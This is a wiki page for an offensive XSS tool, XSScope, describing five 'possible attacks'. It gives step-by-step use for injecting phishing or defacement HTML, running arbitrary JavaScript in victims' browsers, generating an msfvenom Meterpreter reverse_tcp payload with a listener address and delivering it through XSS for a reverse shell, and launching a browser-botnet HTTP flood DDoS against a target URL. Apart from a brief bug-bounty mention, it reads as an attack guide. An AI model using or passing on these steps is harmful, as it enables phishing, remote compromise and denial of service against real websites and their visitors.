Possible attacks

kleiton0x00 edited this page Oct 19, 2020 · 2 revisions

Usage 1 - Hunting for XSS in Bug Bounty

  • Run xsscope.py by executing:
    python3 xsscope.py
  • Go to "XSS Build"
  • Copy the payloads and try them on websites to, hopefully, get an XSS.
  • (Optional) If you want to save all payloads as an intruder file, click Main -> Save as intruder

Usage 2 - Inject HTML code (Phishing or Website Deface)

  • Run xsscope.py by executing:
    python3 xsscope.py
  • Go to "Add HTML code"
  • Choose one of the pregenerated HTML codes from the software, or add your own HTML code.
  • Click "Apply Code" when you finish.
  • Go to XSS Payloads (inside "Add HTML code" window)
  • Try 1 of our 10 payloads, or make your own, and paste it on the website.

Usage 3 - Execute Remote JavaScript Code in the victim's browser

  • Run xsscope.py by executing:
    python3 xsscope.py
  • Go to Reverse Shell
  • On the new tab, enter your command and press Execute

Command examples:

alert(1)
prompt('js code execution by xsscope')
open('https://website.com')
document.querySelector('.title').textContent = 'Injected by XSScope' //This changes the title of the website
document.getElementsByTagName("img")[0].src = "https://website.com/image.png"; //This changes an image in the website

  • And so on. You can use any JavaScript code you want to be executed.

Usage 4 - Execute .NET Shellcode commands

Note: When entering your command/payload, make sure it is base64-encoded.
Purpose: Getting a reverse shell from a targeted user via XSS by using Msfvenom payloads
Steps:

  1. Open a new terminal and generate a base64-encoded reverse_tcp payload with Msfvenom:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.128.73 LPORT=4444 -f raw | base64
    [Screenshot: generating_base64_encoded_payload]
  2. The output (please refer to the photo) is the command which we will enter in XSScope.
  3. Now open XSScope by executing python3 xsscope.py in your terminal.
  4. Go to Agent Module
  5. Check the Execute .NET Shellcode commands option.
    [Screenshot: preparing_js_payload]
  6. Click Build Payload
  7. Click on Main and paste the payload we got in the first step.
  8. Paste the payload into a vulnerable site, and the XSS payload is going to be triggered.

Note: This is just a demo of the feature's usage. You can use another C2 framework and a different type of payload, as long as it is base64-encoded.

Usage 5 - Perform a DDoS attack

  1. Open XSScope and go to HTTP Flood (DDoS)
  2. Enter the URL you want to target
    Note: When entering the URL, please look at the following rules:

Correct URL format:

website.com/index.php
website.com/index.php?id=1 (recommended)
website.com/index.php?id=1&page=home (recommended)
website.com/index.php?id=1&page= (recommended)

Incorrect URL format:

website.com
http://website.com
https://website.com

  3. Check Use HTTPS if the website is using an SSL/TLS certificate; otherwise, don't check it.
  4. Choose how many threads you want the botnet to use (0-100).
    Note: The more threads you set, the more CPU power the victim uses and the higher the chance that the browser freezes.
  5. Once setup is done, click Launch attack.